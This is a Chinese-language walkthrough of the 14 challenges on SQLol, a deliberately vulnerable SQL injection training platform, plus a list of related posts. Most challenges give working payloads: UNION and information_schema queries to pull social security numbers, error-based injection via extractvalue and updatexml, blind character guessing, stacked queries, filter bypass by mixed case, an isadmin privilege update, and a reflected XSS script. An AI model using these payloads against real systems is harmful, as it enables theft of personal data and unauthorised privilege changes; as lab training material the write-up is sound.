SQL注入测试平台 SQLol -6.CHALLENGES挑战
SQLol上面的挑战共有14关,接下来我们一关一关来突破。
Challenge 0
目的是让查询返回所有的用户名,而不是只有一个。
SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC
注入点在【1】处
构造POC: 1' or 1=1# 或者 1' and 1=2 union select username from users#
都可以查询到所有的用户名。
Challenge 1
目标是找到数据库中存在的社会安全号码表并提取信息。
SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC
注入点在【1】处,我们需要知道有哪些表哪些字段,才能找出所想要的信息,为此,我们使用information_schema进行查表查列。
构造POC:
查出数据库所有的库, ' and 1=2 UNION SELECT table_schema FROM information_schema.tables#
选择sqlol库查表, ' and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema='sqlol'#
选择表,查列, ' and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name='ssn'#
选择字段,查数据, ' UNION SELECT concat(name, 0x7e, ssn) FROM ssn#
到此,已经得到所想要的信息。
Challenge 2
目标是找到数据库中存在的社会安全号码表并提取信息。
SELECT username FROM users WHERE isadmin = 【1】 GROUP BY username ORDER BY username ASC
注入点在【1】处,与challenge1类似,所不同的,这是数字型注入,过滤单引号。
构造POC:
查出数据库所有的库,1 and 1=2 UNION SELECT table_schema FROM information_schema.tables#
选择sqlol库查表, 1 and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=0x73716C6F6C#(0x73716C6F6C是sqlol的Hex编码)
选择表,查列, 1 and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x73736E#(0x73736E是ssn的Hex编码)
选择字段,查数据, 1 and 1=2 UNION SELECT concat(name, 0x7e, ssn) FROM ssn#
到此,已经得到所想要的信息。
Challenge 3
目标是找到数据库中存在的社会安全号码表并提取信息。
无提示,只输出一行,详细错误信息,查询不显示,与challenge 1类似。
构造POC:
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 0,1
Challenge 4
目的是找出数据库中存在的社会安全号码表,并提取其信息,无盲SQL注入技术。
提示,有详细的错误,可以使用报错注入
构造POC:
' and extractvalue(1, concat(0x5c,(select user())))#
' AND ExtractValue(1,concat(0x01,(select concat(name,':',ssn) from ssn limit 0,1)))#
Challenge 5
目标是找到数据库中存在的社会安全号码表并提取信息。
提示,使用盲注,无输入错误信息
构造POC:
得到数据库的长度: 1' or length(database())=5#
逐字猜解ascii码: 1' or ascii(mid(database(),1,1))=115#
慢慢猜,总会猜出来的,大致方法就这个。
Challenge 6
目标是创建一个新表称为“ipwntyourdb”使用堆叠的查询。
构造POC:
SELECT username FROM users WHERE username = 'Herp Derper';create table ipwntyourdb( id VARCHAR(100) NOT NULL)# GROUP BY username ORDER BY username ASC
Challenge 7
目标是找到数据库中存在的社会安全号码表,并从数据库中删除任何内容,以提取其信息。
提示:删除,报错,查询不显示
POC:
DELETE FROM users WHERE username = '' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''
Challenge 8
目标找到数据库中存在的社会安全号码表并提取信息。
提示:有黑名单过滤,需绕过,过滤了union,select,where,and,or,--,#等字符。
POC:
' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='
Challenge 9
目的是注入查询并导致其更新ID为3的用户”isadmin”更改为1。
UPDATE users SET isadmin = 1 WHERE id = 3
如何把这句拼接到原有注入点,并执行成功呢?
POC:
UPDATE users SET username = 'admin', isadmin = 1 WHERE id = 3#
更新ID为3的username为admin,并把isadmin改为1.
Challenge 10
目标是从数据库中获取社会安全号码。
提示:注入点在【1】处,SELECT 【1】 FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC
POC:
seLect concat(name,':',ssn) from ssn#
Challenge 11
目标是从数据库中获取社会安全号码。
POC:
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1))) ASC
Challenge 12
目的是使用一个SQL注入漏洞执行反射跨站脚本攻击。
POC:
1' and <script>alert(11)</script>#
SELECT username FROM users WHERE username = ' 1' and <script>alert(11)</script>#' GROUP BY username ORDER BY username ASC
执行过程中,会报错,弹窗,然后提示如下:
SELECT username FROM users WHERE username = '1' and #' GROUP BY username ORDER BY username ASC
JavaScript脚本已经成功在浏览器运行。
Challenge 13
目的是从数据库检索所有的用户名。
POC:
在没有过滤单引号的情况下:select username from users where username LIKE '2' or 1=1
过滤了单引号:
通过模糊查询的方法来盲注,
%,表示任意0个或多个字符
_,表示任意单个字符
[],表示字符括号中所列字符的一个
[^],不在这里的所列字符
根据页面返回是否正确得到判断。
1、得到username的一个首字符
select username from users where username LIKE 'P%' LIMIT 0,1
2、判断以P开头的首字符有几位
select username from users where username LIKE 'P__________' LIMIT 0,1
3、接着往下猜解呗。。。。
SQL注入测试平台 SQLol -6.CHALLENGES挑战的更多相关文章
- SQL注入测试平台 SQLol -1. 简介与安装
最近下载了SQLol测试了一下,感觉挺好玩的,做一下记录. SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句,SQLol还是比较有创意的项目. ...
- SQL注入测试平台 SQLol -2.SELECT注入测试
前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试. 一条完成 ...
- SQL注入测试平台 SQLol -3.INSERT注入测试
访问首页的insert模块,http://127.0.0.1/sql/insert.php,开始对insert模块进行测试. insert语句: INSERT INTO [users] ([usern ...
- SQL注入测试平台 SQLol -5.DELETE注入测试
访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试. delete语法: DELETE FROM [users] WHERE [ ...
- SQL注入测试平台 SQLol -4.UPDATE注入测试
访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试. update语法: UPDATE [users] SET [username ...
- java web sql注入测试(1)---概念概述
在进行java web 测试时,经常会忽略的测试种类就是sql注入测试,这类缺陷造成的原因是开发技术在这方面欠缺的表现,虽然不常见,但一旦有这类缺陷,就很因此对运营的数据造成很多不必要的损失,所以,还 ...
- sql注入测试(1)---概念概述
在进行java web 测试时,经常会忽略的测试种类就是sql注入测试,这类缺陷造成的原因是开发技术在这方面欠缺的表现,虽然不常见,但一旦有这类缺陷,就很因此对运营的数据造成很多不必要的损失,所以,还 ...
- java web sql注入测试(3)---现象分析
那为什么出现以上问题呢?这是程序代码层控制不当导致的.如果web前端对输入数据控制严格,会对数据库进行操作的字符串,在客户端做敏感字符转义处理,或者在操作数据库的dao层,使用动态参数的sql,不使用 ...
- sql注入测试(3)---现象分析
那为什么出现以上问题呢?这是程序代码层控制不当导致的.如果web前端对输入数据控制严格,会对数据库进行操作的字符串,在客户端做敏感字符转义处理,或者在操作数据库的dao层,使用动态参数的sql,不使用 ...
随机推荐
- 二模 (1) day2
第一题: 题目大意: N层楼,K个人,M个箱子在1楼,给出K个人的初始状态(在第几楼,正在向上走还是向下走,向上走的人手里已经有箱子),每次移动一层楼,求把所有箱子(手里拿着的不算在M里)全部搬到顶楼 ...
- Oracle、Mysql、Sql Server语句的区别
1.空值的处理——判断是否为空,为空时取一个值,不为空时取另一个值 1).Sql Server 中 ISNULL(check_expression,replacement_value) 解释:如果ch ...
- C++-指针和引用的区别
1,不存在空引用,指针可以为空 2,引用更高效,使用前不需要测试是否为空 3,指针可以被赋给别的对象,引用则不可以更改 总之,在对象有可能什么也不指向或者指向不同的对象的时候应该使用指针.
- 戴文的Linux内核专题:05配置内核(1)
转自Linux中国 现在我们已经了解了内核,现在我们可以进入主要工作:配置并编译内核代码.配置内核代码并不会花费太长时间.配置工具会询问许多问题并且允许开发者配置内核的每个方面.如果你有不确定的问题或 ...
- 使用icon替换你的网页图标(转)
第一次使用 Font Awesome 发现相当的爽呀!它的图标很全,能够帮你节约时间去找图片.下面就来一起学习吧: 1: 去官方网站下载解压 http://fontawesome.io/ 2: 解压后 ...
- 记录一些容易忘记的属性 -- UIKeyboard
//UIKeyboardWillShowNotification这个通知在软键盘弹出时由系统发送 //UIKeyboardWillShowNotification 通知:键盘将要显示的通知 ...
- SharePoint安全 - 在Goolge和Bing中查找SharePoint相关内容
博客地址 http://blog.csdn.net/foxdave 本篇提供两个查询串字典,分别对应Google和Bing的搜索,用来查询SharePoint网站的相关内容 Google ShareP ...
- winform错误提示 :窗口类名无效(Window class name is not valid)
winfrom 程序在 xp 操作系统上报错提示 窗口类名无效(Window class name is not valid) 解决方法 注释 Program类 里 这句 Application.En ...
- 静态方法被override
其实这并不是真正意义上的java override,因为如果在子类的方法上面加上@override编译不通过 而且如果使用父类引用指向子类实例,那么调用被改写的子类和父类都有的静态方法,执行的还是父类 ...
- 解决问题:centos虚拟机安装好nginx,本机无法访问
阵子在虚拟机上装好了centos5.3,并配好了nginx+php+mysql,但是本机就是无法访问.一直就没去折腾了.具体情况如下1.本机能ping通虚拟机2.虚拟机也能ping通本机3.虚拟机能访 ...